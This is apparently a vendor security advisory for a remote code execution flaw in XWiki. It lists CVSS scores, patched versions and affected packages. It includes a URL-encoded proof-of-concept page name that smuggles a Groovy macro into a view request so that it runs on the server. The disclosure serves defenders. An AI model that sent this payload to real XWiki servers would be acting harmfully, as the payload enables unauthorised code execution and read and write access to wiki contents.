CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
LOW
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L
EPSS
Percentile
73.1%
Any user with view rights can execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents. The attack works by opening a non-existing page with a name crafted to contain a dangerous payload.
For instance: Open <xwiki-host>/xwiki/bin/view/%22%2F%7D%7D%7B%7B%2Fhtml%7D%7D%20%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22Hello%20%22%20%2B%20%22from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D?sheet=XWiki.ClassSheet&xpage=view
, where <xwiki-host>
is the URL of your XWiki installation.
This has been patched in XWiki 14.4.8, 14.10.3 and 15.0RC1.
The fix is only impacting Velocity templates and page contents, so applying this patch is enough to fix the issue.
If you have any questions or comments about this advisory:
Vendor | Product | Version | CPE |
---|---|---|---|
org.xwiki.platform | xwiki-platform-xclass-ui | * | cpe:2.3:a:org.xwiki.platform:xwiki-platform-xclass-ui:*:*:*:*:*:*:*:* |